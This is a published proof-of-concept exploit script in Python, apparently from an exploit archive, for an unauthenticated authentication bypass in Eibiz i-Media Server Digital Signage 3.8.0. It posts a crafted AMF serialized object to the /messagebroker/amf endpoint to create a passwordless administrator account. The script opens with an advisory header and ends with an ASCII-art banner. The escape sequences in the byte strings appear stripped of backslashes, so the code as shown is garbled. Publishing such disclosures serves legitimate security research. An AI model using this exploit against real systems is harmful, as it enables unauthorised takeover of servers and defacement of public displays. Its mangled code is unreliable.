# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass
# Date: 2020-08-21
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.eibiz.co.th
# Version: < =3.8.0
# CVE: N/A
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: <=3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from unauthenticated privilege escalation and
# arbitrary user creation vulnerability that allows authentication bypass.
# Once serialized, an AMF encoded object graph may be used to persist and retrieve
# application state or allow two endpoints to communicate through the exchange
# of strongly typed data. These objects are received by the server without validation
# and authentication and gives the attacker the ability to create any user with
# any role and bypass the security control in place and modify presented data on
# the screen/billboard.
#
# =========================================================================================
#
# # python3 imedia_createUser.py 192.168.1.1 waddup
#
# --Sending serialized object...
# --Replaying...
#
# ------------------------------------------------------
# Admin user 'waddup' successfully created. No password.
# ------------------------------------------------------
#
# =========================================================================================
#
# Tested on: Windows Server 2016
# Windows Server 2012 R2
# Windows Server 2008 R2
# Apache Flex
# Apache Tomcat/6.0.14
# Apache-Coyote/1.1
# BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5586
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
#
#
# 26.07.2020
#
#
import time as go
import requests
import sys
import re
class __CreateAdmin__:
def __init__(self):
self.ep = "/messagebroker/amf"
self.agent = "CharlieChaplin"
self.amfpacket = None
self.bytecount = None
self.bytesdata = None
self.address = None
self.headers = None
self.usrname = None
self.ende = None
def usage(self):
if len(sys.argv) != 3:
self.me()
msg = "x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"
brd = "-" * len(msg + "x20")
print("n" + brd)
print(msg)
print("x20Usage: ./i-media.py [ip] [username]")
print(brd)
exit(12)
else:
self.address = sys.argv[1]
self.usrname = sys.argv[2]
if not "http" in self.address:
self.address = "http://{}".format(self.address)
def amf(self):
self.headers = {"User-Agent" : self.agent,
"Accept" : "*/*",
"Accept-Language" : "en-US,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Origin" : self.address,
"Connection" : "close",
"Referer" : self.address + "/main.swf",
"Content-Type" : "application/x-amf"}
self.amfpacket = b"x00x03x00x00x00x01x00x04x6E"
self.amfpacket += b"x75x6Cx6Cx00x03x2Fx33x36x00"
self.amfpacket += b"x00x01xB3x0Ax00x00x00x01x11"
self.amfpacket += b"x0Ax81x13x4Fx66x6Cx65x78x2E"
self.amfpacket += b"x6Dx65x73x73x61x67x69x6Ex67"
self.amfpacket += b"x2Ex6Dx65x73x73x61x67x65x73"
self.amfpacket += b"x2Ex52x65x6Dx6Fx74x69x6Ex67"
self.amfpacket += b"x4Dx65x73x73x61x67x65x0Dx73"
self.amfpacket += b"x6Fx75x72x63x65x13x6Fx70x65"
self.amfpacket += b"x72x61x74x69x6Fx6Ex13x74x69"
self.amfpacket += b"x6Dx65x73x74x61x6Dx70x09x62"
self.amfpacket += b"x6Fx64x79x11x63x6Cx69x65x6E"
self.amfpacket += b"x74x49x64x0Fx68x65x61x64x65"
self.amfpacket += b"x72x73x15x74x69x6Dx65x54x6F"
self.amfpacket += b"x4Cx69x76x65x17x64x65x73x74"
self.amfpacket += b"x69x6Ex61x74x69x6Fx6Ex13x6D"
self.amfpacket += b"x65x73x73x61x67x65x49x64x01"
self.amfpacket += b"x06x15x63x72x65x61x74x65x55"
self.amfpacket += b"x73x65x72x04x00x09x03x01x0A"
self.amfpacket += b"x81x73x1Bx64x73x2Ex6Dx6Fx64"
self.amfpacket += b"x65x6Cx2Ex55x73x65x72x11x70"
self.amfpacket += b"x61x73x73x77x6Fx72x64x0Dx63"
self.amfpacket += b"x72x65x61x74x65x07x74x65x6C"
self.amfpacket += b"x07x66x61x78x09x6Ex61x6Dx65"
self.amfpacket += b"x0Fx61x64x64x72x65x73x73x0D"
self.amfpacket += b"x75x70x64x61x74x65x05x69x64"
self.amfpacket += b"x0Dx6Dx6Fx62x69x6Cx65x0Fx75"
self.amfpacket += b"x44x65x6Cx65x74x65x15x64x65"
self.amfpacket += b"x70x61x72x74x6Dx65x6Ex74x09"
self.amfpacket += b"x72x6Fx6Cx65x09x72x65x61x64"
self.amfpacket += b"x0Bx65x6Dx61x69x6Cx0Fx63x6F"
self.amfpacket += b"x6Dx70x61x6Ex79x06x01x03x06"
self.amfpacket += b"x01x06x01x06" ##################"
self.bytecount = len(self.usrname * 2) + 1
self.bytesdata = [self.bytecount]
self.amfpacket += "".join(map(chr, self.bytesdata))
self.amfpacket += (bytes(self.usrname.encode("utf-8")))
self.amfpacket += b"x06x01x03x06x36x06x01x03x06"
self.amfpacket += b"x01x06x1Bx41x64x6Dx69x6Ex69"
self.amfpacket += b"x73x74x72x61x74x6Fx72x03x06"
self.amfpacket += b"x01x06x01x01x0Ax0Bx01x15x44"
self.amfpacket += b"x53x45x6Ex64x70x6Fx69x6Ex74"
self.amfpacket += b"x06x0Dx6Dx79x2Dx61x6Dx66x09"
self.amfpacket += b"x44x53x49x64x06x49x39x36x42"
self.amfpacket += b"x30x42x46x38x43x2Dx41x31x31"
self.amfpacket += b"x41x2Dx38x41x32x34x2Dx38x31"
self.amfpacket += b"x43x31x2Dx35x38x37x45x41x33"
self.amfpacket += b"x41x43x41x33x38x43x01x04x00"
self.amfpacket += b"x06x17x75x73x65x72x53x65x72"
self.amfpacket += b"x76x69x63x65x06x49x39x39x46"
self.amfpacket += b"x45x43x43x46x39x2Dx34x41x38"
self.amfpacket += b"x44x2Dx46x46x34x31x2Dx31x41"
self.amfpacket += b"x36x36x2Dx42x46x39x31x32x45"
self.amfpacket += b"x42x42x44x36x35x36" ##########"
print("n--Sending serialized object...")
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode("utf-8"))
go.sleep(2)
print("--Replaying...")
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode("utf-8"))
self.ende = "Admin user '" + self.usrname + "' successfully created. No password."
print
print("-" * len(self.ende))
print(self.ende)
print("-" * len(self.ende))
def me(self):
cc = """
/`,.,,,.
:.......,,
,.........7
,.........$
......:=+=$
I.....,,:~,.:
$.?7IZDDNNN~.
$$: 8D=:I D,
D~,7NI7DNN
DDD NNN:
D8.ININ;
D8?7DZS
.ZDNNND D
S..,.~8?,N OO77
N......,..$=77:+?=~8
:......,::=.I8?:+=.=+~++
=.......,:+$=+O:+==~~++++=
8...........~7D$::~..~====:++
I.............:+.....~~~=~:~+?
N,............. .+...,:~=+~~ :+=$
;....... ......, .,....,:=+:,..~=?
Z,,...... :............,::~~=...===I
=.......$ Z...... =~,,,,.,:~,...,7~=
+....... 8.....,.=~~~:.~~~=:~ ..:$==
,...... +,..,,:.=~:~+I:,+I=8:...=?~
,....., =...,,,8+=,:~=~I=~~ N...:+?
,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=?
8...... ,...7=Z$DN:?::=I~~$ =..,=+
...,..D ,....O88D,8D,:=:==+?? ...,:7
,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+
......8D .. .... :?~8D:.:~~=++ ..,~II
:....~D+: . . . ..,..==~===N +,.,=$
,. DDND.......... .,...,===+=N ..,+?Z
DD 88 .......... ....,..~+=~N ..,~?I
....... ,,.,,.:...=?? 8..~=I$
....... ...,,,,. ,:~= ..:=~?
........ ,.,,..,:.. I.:+?+D
....... .......,:,,8 ,..IN
........ .,.. ..,,:.: :8N
........ ... ..,::,, I+O
........ ......,:,. O.ZN
........ . . ...,,,,. D+
............ ....,,,. =
....... . ....,,, ?
....... .....,,, 7
...... . ..,,,, +
:..... ..,.,, 8
:....... =. .....,,,N 8
~....... D. .....,,,D 8
~....... D. . ...,,,O D
=.... .....,,Z ?`
+...... . :........,.$ +
I...... ........,.7 =
Z........ . . ....,,7 D
N..... ... . ........I 8
..... ... , ........I 8
...... . = .. .....I 7
:.. . ..7 8... .....I ?
Z.. D .. ....7 N NND88OOOOOOO88DN
O.. . .. ....O O D8OZ$77II777$$ZO8DN
... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN
.,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N
$.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN
... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N
Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N
=.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN
... .?, I777IIIIIIIII7$~O8N NNNNN
8.... .I. ...7IIIIII7$Z8DD NNNNN
NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN
N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN
?,:..:,.=N I.....,,=I+ N8
~....,8
"""
j = 0
while j < len(cc):
char = cc[j]
sys.stdout.write(char)
go.sleep(10.0 / 100000.0)
j = j + 1
def main(self):
self.usage()
self.amf()
if __name__ == '__main__':
__CreateAdmin__().main()
Gloss